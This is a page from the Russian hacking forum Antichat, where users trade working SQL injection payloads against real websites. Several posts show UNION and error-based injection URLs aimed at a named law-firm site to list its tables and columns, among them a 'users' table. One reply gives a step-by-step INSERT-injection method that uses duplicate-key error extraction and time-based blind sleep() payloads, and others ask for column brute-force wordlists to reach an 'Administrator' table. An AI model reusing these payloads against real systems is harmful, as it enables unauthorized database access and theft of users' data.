HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1651 из 2438 « Первая < 6511151155116011641 1647 1648 1649 1650 1651 1652 1653 1654 1655 1661170117512151 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #16501  
Старый 05.03.2011, 00:04
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
так отоброжает скуль:

_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables

а так нет:

_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name= 0x%75%73%65%72%73

подскажите куда копать дальше.
 
Ответить с цитированием

  #16502  
Старый 05.03.2011, 00:10
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
Цитата:
Сообщение от winstrool  
так отоброжает скуль:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables
а так нет:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name= 0x%75%73%65%72%73
подскажите куда копать дальше.
%75%73%65%72%73 wtf?

// Ты не в теме, это приватный zero day эксплойт

чОрт( я снова не в теме(
 
Ответить с цитированием

  #16503  
Старый 05.03.2011, 00:34
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию
Цитата:
Сообщение от winstrool  
так отоброжает скуль:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables
а так нет:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name= 0x%75%73%65%72%73
подскажите куда копать дальше.
При чем тут URLENCODE? надо в hex.
 
Ответить с цитированием

  #16504  
Старый 05.03.2011, 01:39
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию
Помогите вывести имена колонок.

http://www.pravo-advokat.ru/index.php?p_id=2+and+(select*from(select+count(*)f rom(select+1+union+select+2+union+select+3)x+group +by+concat(mid((select+column_name+from+INFORMATIO N_SCHEMA.columns+where+table_name=0x7573657273+lim it+0,1),1,64),floor(rand(0)*2)))z)+--+&m_id=4
 
Ответить с цитированием

  #16505  
Старый 05.03.2011, 01:42
BluR
Познающий
Регистрация: 06.08.2009
Сообщений: 56
С нами: 8823864

Репутация: 29
По умолчанию
вечер всем добрый ... нужно помощь в sql inj ... сразу скажу .. я новичок ... так что могу написать глупость ...

к делу ... есть иньекция в guestbook одного сайта (могу кинуть ссылку в пм) ...

при добавление ковычки к запросу получаю ошибку :

Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1111@1111.111','bbbbbbbbbbb',null, CURRENT_TIMESTAMP)' at line 1

Как я понимаю запрос выглядит примерно так :

INSERT INTO tables VALUES ('name','mail','mesege',null, CURRENT_TIMESTAMP)

подставляю' ) --

получаю ошибку

Ошибка: Column count doesn't match value count at row 1

тогда подставляю bvbvbvbb','ewewe@wewew.ru','ffffffffff',null, CURRENT_TIMESTAMP ) --

как я понимаю ... должно добавиться сообщение в гостевой книге но опятьже получаю ошибку

Ошибка: Column count doesn't match value count at row 1

Подскажите люди добрые ... как тут быть

P.s иньекцию делаю через форму name
 
Ответить с цитированием

  #16506  
Старый 05.03.2011, 06:11
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
При подстановке ' довольно часто сталкиваюсь вот с такой ошибкой

Цитата:
Сообщение от None  
org.springframework.beans.TypeMismatchException: Failed to convert value of type [java.lang.String] to required type [java.lang.Integer]; nested exception is java.lang.NumberFormatException: For input string: "37752'" at org.springframework.beans.SimpleTypeConverter.conv ertIfNecessary(SimpleTypeConverter.java:50) at org.springframework.validation.DataBinder.convertI fNecessary(DataBinder.java:454) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.resolveRequestParam(HandlerMeth odInvoker.java:339) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.resolveHandlerArguments(Handler MethodInvoker.java:200) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.invokeHandlerMethod(HandlerMeth odInvoker.java:130) at org.springframework.web.servlet.mvc.annotation.Ann otationMethodHandlerAdapter.invokeHandlerMethod(An notationMethodHandlerAdapter.java:310) at org.springframework.web.servlet.mvc.annotation.Ann otationMethodHandlerAdapter.handle(AnnotationMetho dHandlerAdapter.java:297) at org.springframework.web.servlet.DispatcherServlet. doDispatch(DispatcherServlet.java:875) at org.springframework.web.servlet.DispatcherServlet. doService(DispatcherServlet.java:809) at org.springframework.web.servlet.FrameworkServlet.p rocessRequest(FrameworkServlet.java:571) at org.springframework.web.servlet.FrameworkServlet.d oGet(FrameworkServlet.java:501) at javax.servlet.http.HttpServlet.service(HttpServlet .java:707) at javax.servlet.http.HttpServlet.service(HttpServlet .java:820) at org.mortbay.jetty.servlet.ServletHolder.handle(Ser vletHolder.java:487) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1093) at ims.app.filters.StatusReportingFilter.doFilter(Sta tusReportingFilter.java:19) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.mortbay.jetty.servlet.ServletHandler.handle(Se rvletHandler.java:360) at org.mortbay.jetty.security.SecurityHandler.handle( SecurityHandler.java:216) at org.mortbay.jetty.servlet.SessionHandler.handle(Se ssionHandler.java:181) at org.mortbay.jetty.handler.ContextHandler.handle(Co ntextHandler.java:726) at org.mortbay.jetty.webapp.WebAppContext.handle(WebA ppContext.java:405) at org.mortbay.jetty.servlet.Dispatcher.forward(Dispa tcher.java:285) at org.mortbay.jetty.servlet.Dispatcher.forward(Dispa tcher.java:126) at ims.app.session.wl.WhiteLabelUrlHelper.findWhiteLa belRedirect(WhiteLabelUrlHelper.java:78) at gb.app.servlet.Gateway.doFilter(Gateway.java:65) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.springframework.orm.hibernate3.support.OpenSes sionInViewFilter.doFilterInternal(OpenSessionInVie wFilter.java:198) at org.springframework.web.filter.OncePerRequestFilte r.doFilter(OncePerRequestFilter.java:76) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.mortbay.jetty.servlet.ServletHandler.handle(Se rvletHandler.java:360) at org.mortbay.jetty.security.SecurityHandler.handle( SecurityHandler.java:216) at org.mortbay.jetty.servlet.SessionHandler.handle(Se ssionHandler.java:181) at org.mortbay.jetty.handler.ContextHandler.handle(Co ntextHandler.java:726) at org.mortbay.jetty.webapp.WebAppContext.handle(WebA ppContext.java:405) at org.mortbay.jetty.handler.ContextHandlerCollection .handle(ContextHandlerCollection.java:196) at org.mortbay.jetty.handler.HandlerCollection.handle (HandlerCollection.java:114) at org.mortbay.jetty.handler.HandlerWrapper.handle(Ha ndlerWrapper.java:152) at org.mortbay.jetty.handler.StatisticsHandler.handle (StatisticsHandler.java:89) at org.mortbay.jetty.handler.HandlerWrapper.handle(Ha ndlerWrapper.java:152) at org.mortbay.jetty.Server.handle(Server.java:324) at org.mortbay.jetty.HttpConnection.handleRequest(Htt pConnection.java:505) at org.mortbay.jetty.HttpConnection$RequestHandler.he aderComplete(HttpConnection.java:829) at org.mortbay.jetty.HttpParser.parseNext(HttpParser. java:514) at org.mortbay.jetty.HttpParser.parseAvailable(HttpPa rser.java:211) at org.mortbay.jetty.HttpConnection.handle(HttpConnec tion.java:380) at org.mortbay.io.nio.SelectChannelEndPoint.run(Selec tChannelEndPoint.java:395) at org.mortbay.thread.BoundedThreadPool$PoolThread.ru n(BoundedThreadPool.java:450) Caused by: java.lang.NumberFormatException: For input string: "37752'" at java.lang.NumberFormatException.forInputString(Num berFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:458) at java.lang.Integer.valueOf(Integer.java:554) at org.springframework.util.NumberUtils.parseNumber(N umberUtils.java:146) at org.springframework.beans.propertyeditors.CustomNu mberEditor.setAsText(CustomNumberEditor.java:114) at org.springframework.beans.TypeConverterDelegate.do ConvertTextValue(TypeConverterDelegate.java:374) at org.springframework.beans.TypeConverterDelegate.do ConvertValue(TypeConverterDelegate.java:350) at org.springframework.beans.TypeConverterDelegate.co nvertIfNecessary(TypeConverterDelegate.java:173) at org.springframework.beans.TypeConverterDelegate.co nvertIfNecessary(TypeConverterDelegate.java:107) at org.springframework.beans.SimpleTypeConverter.conv ertIfNecessary(SimpleTypeConverter.java:47) ... 47 more
Так понимаю это ничего не дает или я не прав?
 
Ответить с цитированием

  #16507  
Старый 05.03.2011, 12:36
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию
Цитата:
Сообщение от None  
вечер всем добрый ... нужно помощь в sql inj ... сразу скажу .. я новичок ... так что могу написать глупость ...
к делу ... есть иньекция в guestbook одного сайта (могу кинуть ссылку в пм) ...
при добавление ковычки к запросу получаю ошибку :
Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1111@1111.111','bbbbbbbbbbb',null, CURRENT_TIMESTAMP)' at line 1
Как я понимаю запрос выглядит примерно так :
INSERT INTO tables VALUES ('name','mail','mesege',null, CURRENT_TIMESTAMP)
подставляю ' ) --
получаю ошибку
Ошибка: Column count doesn't match value count at row 1
тогда подставляю bvbvbvbb','ewewe@wewew.ru','ffffffffff',null, CURRENT_TIMESTAMP ) --
как я понимаю ... должно добавиться сообщение в гостевой книге но опятьже получаю ошибку
Ошибка: Column count doesn't match value count at row 1
Подскажите люди добрые ... как тут быть
P.s иньекцию делаю через форму name
Таблица tables содержит 5 колонок (количество полей в левой и правой части запроса должно совпадать)

Вписывая в поле ' )-- -

Запрос принимает вид

Код HTML:
INSERT INTO tables VALUES ('')-- -
MySQL выдаст ошибку: Column count doesn't match value count at row 1, так как количество полей не совпадает.

Как проводить инъекцию, зависит от того, что ты хочешь получить.

Ты можешь либо уравнять количество полей и вписать произвольные значения в базу в текущий запрос, отсеив остальное комментарием

bla','123123','122@mail.ru','ya mega hacker','777')-- -

Запрос примет вид

Код HTML:
INSERT INTO tables VALUES ('bla','123123','122@mail.ru','ya mega hacker','777')-- -
либо спровоцировать ошибку duplicate entry и выводить инфу через нее

bla','123123','122@mail.ru','ya mega hacker','777') on duplicate key update name = (select 1 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a)-- -

Запрос примет вид

Код HTML:
INSERT INTO tables VALUES ('bla','123123','122@mail.ru','ya mega hacker','777') on duplicate key update name = (select 1 from (select count(*), concat(version(), floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Вывод: Duplicate entry '5.0.91-community1' for key 1

Либо вытаскивать инфу основываясь на временных задержках

bla','123123','122@mail.ru','ya mega hacker',(if(ascii(mid((select table_name from information_schema.tables limit 0,1),1,1))>66,(sleep(10)),1)))-- -

Запрос примет вид

Код HTML:
INSERT INTO tables VALUES ('bla','123123','122@mail.ru','ya mega hacker',(if(ascii(mid((select table_name from information_schema.tables limit 0,1),1,1))>66,(sleep(10)),1)))-- -
И так далее

UPD: Не внимательно прочитал сообщение, тогда пали сюда линк.
 
Ответить с цитированием

  #16508  
Старый 05.03.2011, 14:21
omg_it_glowZ
Познающий
Регистрация: 29.01.2011
Сообщений: 38
С нами: 8044886

Репутация: -2
По умолчанию
Есть у кого словарь для брута колонок? Не могу никак в таблице Administrator подобрать колонки...
 
Ответить с цитированием

  #16509  
Старый 05.03.2011, 14:28
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
/thread148915-toolza.html вот тут хороший
 
Ответить с цитированием

  #16510  
Старый 05.03.2011, 14:30
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
С нами: 10039659

Репутация: 209
По умолчанию
Какая-то странная скуля, может кто сталкивался

+union+select+1--

Код:
Database access error:
SELECT `username`, `name`, `date` FROM `users` WHERE `ID`=9999999999 union select 1--
+union+select+1,2--

Код:
Database access error:
SELECT `picture` FROM `users` WHERE `ID`=9999999999 union select 1,2--
Не могу понять каким образом разные запросы вылазят.
 
Ответить с цитированием
Ответ
Страница 1651 из 2438 « Первая < 6511151155116011641 1647 1648 1649 1650 1651 1652 1653 1654 1655 1661170117512151 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.